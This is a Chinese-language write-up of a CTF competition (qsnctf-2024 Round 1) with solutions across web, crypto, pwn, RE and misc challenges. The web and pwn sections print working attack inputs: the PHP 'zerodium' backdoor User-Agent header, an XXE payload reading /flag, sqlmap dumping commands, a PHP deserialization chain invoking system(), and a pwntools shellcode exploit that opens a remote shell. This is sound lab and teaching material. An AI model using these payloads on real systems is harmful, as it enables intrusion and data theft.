qsnctf-2024#Round1

WEB

EasyMD5

考查 MD5碰撞

随便上传文件，将其发送到 Repeater

发现需要 pdf 的 MIME

设置 Content-Type 为 application/pdf

猜测题目意思为不同文件，但需要 `md5($a) == md5($b)

根据

<?php
$a = md5('240610708'); // = 0e462097431906509019562988736854
$b = md5('QNKCDZO'); // = 0e830400451993494058024219903391
var_dump($a == $b);
?>

所以文件内容修改为 240610708 与 QNKCDZO

PHP的后门

根据提示查看 服务器php版本

搜索可知此版本有远程命令执行漏洞

修改 User-Agentt: zerodiumsystem("cat /flag");

PHP的XXE

给了 phpinfo

搜索可知 dom.php 可以触发XXE漏洞

随手拿个poc

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe[ 
	<!ELEMENT test ANY >	
	<!ENTITY xxe SYSTEM "file:///flag" >]>	
<test>
	<name>&xxe;</name>					
</test>	

Easy_SQLi

简单的布尔盲注，顺便试下 sqlmap

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 --dbs

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 -D qsnctf --tables

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 -D qsnctf -T users --columns

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 -D qsnctf -T users -C password,username --dump

雏形系统

php 反序列化

拿 dirsearch 扫了一下得到 /www.zip

发现php加密了

找个解密网站得到原始代码

<?php
    error_reporting(0);

    class shi
    {
        public $next;
        public $pass;
        public function __toString(){
            $this->next::PLZ($this->pass);
        }
    }
    class wo
    {
        public $sex;
        public $age;
        public $intention;
        public function __destruct(){
            echo "Hi Try serialize Me!";
            $this->inspect();
        }
        function inspect(){
            if($this->sex=='boy'&&$this->age=='eighteen')
            {
                echo $this->intention;
            }
            echo "🙅18岁🈲";
        }
    }

    class Demo
    {
        public $a;
        static function __callStatic($action, $do)
        {
            global $b;
            $b($do[0]);
        }
    }

    $b = $_POST['password'];
    $a = $_POST['username'];
    @unserialize($a);
    if (!isset($b)) {
        echo "==================PLZ Input Your Name!==================";
    }
    if($a=='admin'&&$b=="'k1fuhu's test demo")
    {
        echo("登录成功");
    }

    ?>

思路很清晰

直接构造

$c = new wo;
$c->sex = "boy";
$c->age = "eighteen";
$Shit = new shi();
$damn = new Demo;
$damn->$b = "system";
$damn->$a = "system";
$Shit->next = $damn;
$Shit->pass = "cat /flag";
$c->intention = $Shit;

O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":2:{s:1:"a";N;s:0:"";s:6:"system";}s:4:"pass";s:9:"cat /flag";}}

CRYPTO

解个方程

欢迎来到青少年CTF，领取你的题目，进行解答吧！这是一道数学题！！
    p = 70559223834693127821574754764487916409
    q = 291568698992769291833060922537869705687
    e = 65537
    d = ?
    

import gmpy2
p = 70559223834693127821574754764487916409
q = 291568698992769291833060922537869705687
e = 65537
 
s = (p-1)*(q-1)
d = gmpy2.invert(e,s)
print ("dec: " + str(d))

ez_log

from Crypto.Util.number import *
from random import *
flag=b'key{xxxxxxx}'
m=bytes_to_long(flag)
p=3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037
g=3
c=pow(g,m,p)
print(f'c=',c)

    c=1409970374102613813154760568158003123875011225002977256272054381228289122265018484564640527366469489471011960208090567829620353663244080501413923713114331075726206212331906003182378049316620

from sympy import *
from Crypto.Util.number import *

# 已知的参数
p = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037
g = 3
c = 1409970374102613813154760568158003123875011225002977256272054381228289122265018484564640527366469489471011960208090567829620353663244080501413923713114331075726206212331906003182378049316620

# 计算离散对数
m = discrete_log(p, c, g)
print("m =", long_to_bytes(m))

ezrsa

题干

from Crypto.Util.number import *
flag = b'qsnctf{xxx-xxxx-xxxx-xxxx-xxxxxxxxx}'
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
r = getPrime(512)
n = p * q * r
leak = p * q
e = 0x10001
c = pow(m, e, n)
print(f'c = {c}')
print(f'n = {n}')
print(f'leak = {leak}')
# c = 173595148273920891298949441727054328036798235134009407863895058729356993814829340513336567479145746034781201823694596731886346933549577879568197521436900228804336056005940048086898794965549472641334237175801757569154295743915744875800647234151498117718087319013271748204766997008772782882813572814296213516343420236873651060868227487925491016675461540894535563805130406391144077296854410932791530755245514034242725719196949258860635915202993968073392778882692892
# n = 1396260492498511956349135417172451037537784979103780135274615061278987700332528182553755818089525730969834188061440258058608031560916760566772742776224528590152873339613356858551518007022519033843622680128062108378429621960808412913676262141139805667510615660359775475558729686515755127570976326233255349428771437052206564497930971797497510539724340471032433502724390526210100979700467607197448780324427953582222885828678441579349835574787605145514115368144031247
# leak = 152254254502019783796170793516692965417859793325424454902983763285830332059600151137162944897787532369961875766745853731769162511788354655291037150251085942093411304833287510644995339391240164033052417935316876168953838783742499485868268986832640692657031861629721225482114382472324320636566226653243762620647

from sage.all import *
from Crypto.Util.number import *
r=n//leak
d=inverse_mod(65537,r-1)
m=pow(c,d,r)
print(long_to_bytes(m))

factor1

import gmpy2
import hashlib
from Crypto.Util.number import *

p = getPrime(512)
q = getPrime(512)
d = getPrime(256)
e = gmpy2.invert(d, (p**2 - 1) * (q**2 - 1))
flag = "qsnctf{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"
print(e)
print(p * q)
# 4602579741478096718172697218991734057017874575484294836043557658035277770732473025335441717904100009903832353915404911860888652406859201203199117870443451616457858224082143505393843596092945634675849883286107358454466242110831071552006337406116884147391687266536283395576632885877802269157970812862013700574069981471342712011889330292259696760297157958521276388120468220050600419562910879539594831789625596079773163447643235584124521162320450208920533174722239029506505492660271016917768383199286913178821124229554263149007237679675898370759082438533535303763664408320263258144488534391712835778283152436277295861859
# 78665180675705390001452176028555030916759695827388719494705803822699938653475348982551790040292552032924503104351703419136483078949363470430486531014134503794074329285351511023863461560882297331218446027873891885693166833003633460113924956936552466354566559741886902240131031116897293107970411780310764816053

from sage.all import *
import hashlib
from Crypto.Util.number import *
A=matrix(ZZ,2)
A[0,0]=2**1024
A[0,1]=e
A[1,1]=n^2
res=A.LLL()
print(res[0])
x=res[0,0]
d=x//(2**1024)
k=(e*d-1)//(n^2)+1
p2q2=1+n^2-(e*d-1)//k
pq=isqrt(p2q2+2*n)
flag = "qsnctf{" + hashlib.md5(str(pq).encode()).hexdigest() + "}"

四重加密

base32

OFZW4Y3UMY======
qsnctf

得到

zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello

html 实体解码

根据前四个字母 flag 判断

PWN

简单的数学题

nc上去算三道数学题就行

Easy_Shellcode

from pwn import *
import re

#context.log_level = "debug"
context.arch = 'amd64'

p = remote("challenge.qsnctf.com", 31977)#process("./easy-shellcode")

buf_addr = p.recvuntil("\n")[:-1]
print(buf_addr)
shellcode_addr = int(buf_addr,16) + 32  


shellcode = asm(shellcraft.sh())

payload = shellcode + b'a' * (0x100 + 0x8 - len(shellcode)) + p64(int(buf_addr,16))
#p.recv()
p.sendline(payload)
p.interactive()

RE

来打CS咯

在线网站微步在线云沙箱 (threatbook.com)

分析网络行为即可

MISC

CTFer Revenge

题目太长贴个图片吧

经常使用 hex editor 的应该很熟悉

根据提示 从反方向开始移动， 回到当初爱你的时空

从尾巴开始看

可以发现熟悉的PK文件头

可知为 zip文件

写脚本转置一下就行

def reverse_string(string):
    """Reverse the given string."""
    return string[::-1]


def reverse_lines(input_file, output_file):
    """Read lines from input_file, remove first 9 characters, reverse each line, and write to output_file."""
    with open(input_file, "r") as fin, open(output_file, "w") as fout:
        lines = fin.readlines()

        for line in reversed(lines):
            # Remove first 9 characters and reverse the line
            start_index = line.find("|")
            end_index = line.rfind("|")
            if start_index != -1 and end_index != -1:
                # Remove content between '|' and reverse the line
                reversed_line = reverse_string(
                    line[:start_index] + line[end_index + 1 :].strip()
                )
            else:
                # If '|' is not found or only one '|' is found, reverse the entire line
                reversed_line = reverse_string(line.strip())
            # Write reversed line to output file
            fout.write(reversed_line[9:] + "\n")


if __name__ == "__main__":
    input_file = "a.txt"
    output_file = "c.txt"

    reverse_lines(input_file, output_file)
    print("Lines reversed and written to", output_file)

调整下手动写入变成 zip 文件

有密码加密

根据提示

使用 APCHPR 爆破

多情

图片 foremost 出新图片

存在 crc 错误，找个脚本爆破，修改

import zlib
import struct


with open(r"./00000013.png", "rb") as image_data:
    bin_data = image_data.read()
data = bytearray(bin_data[12:29])
crc32key = 0x51F95FB8
# 理论上0xffffffff,但考虑到屏幕实际，0x0fff就差不多了
n = 4096
# 高和宽一起爆破
for w in range(n):
    # q为8字节，i为4字节，h为2字节
    width = bytearray(struct.pack(">i", w))
    for h in range(n):
        height = bytearray(struct.pack(">i", h))
        for x in range(4):
            data[x + 4] = width[x]
            data[x + 8] = height[x]
        crc32result = zlib.crc32(data)
        if crc32result == crc32key:
            print(
                "width:%s  height:%s"
                % (bytearray(width).hex(), bytearray(height).hex())
            )
            exit()

得到提示

根据zip 0 1 猜测 二进制

1111100100 // 996

第二个零bn

第二个一p5

第六个一f6H

第三个零QS

第三个一mJ

第四个零Nh

第四个一cd

第五个一Eb

第一个零bv2

第一个一Lr

Lrp5mJcdEbbv2bnf6HQSNh

出了半天，但是没想到这就是flag了

小光的答案之书

首先

后来搜索到

得到密码为：life

关注即可

ez_model

import torch
import torch.nn as nn


# 重新定义模型类
class MyModel(nn.Module):
    def __init__(self):
        super(MyModel, self).__init__()
        # 卷积层
        self.conv1 = nn.Conv2d(
            in_channels=3, out_channels=16, kernel_size=3, stride=1, padding=1
        )
        self.conv2 = nn.Conv2d(
            in_channels=16, out_channels=32, kernel_size=3, stride=1, padding=1
        )
        # 全连接层
        self.fc = nn.Linear(32 * 32 * 32, 10)  # 假设输入尺寸是32x32，输出类别数为10
        # 添加额外的键
        self.flag = nn.Parameter(torch.zeros(54))  # 假设flag是一个标量张量
        self.hint = nn.Parameter(torch.zeros(64))  # 假设hint是一个标量张量

    def forward(self, x):
        x = torch.relu(self.conv1(x))
        x = torch.relu(self.conv2(x))
        x = x.view(x.size(0), -1)  # 将张量展平成一维向量
        x = self.fc(x)
        return x


# 创建新的模型实例
model = MyModel()

# 加载.pth文件到模型中
path = "easy.pth"  # 替换成你的.pth文件的路径
checkpoint = torch.load(path)

# 从检查点中提取参数并加载到模型中
model.load_state_dict(checkpoint)

print(checkpoint["hint"])

print(checkpoint["flag"]) 

得到

转成ascii得

hint: ZzYyXxAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWw0123456789+/
flag: LidUJ3fQM2FVJoxpDwLvDyF3DwpPdwxOEgbQJoxnEgdnJgnojoZ5mF

使用 Cyberchef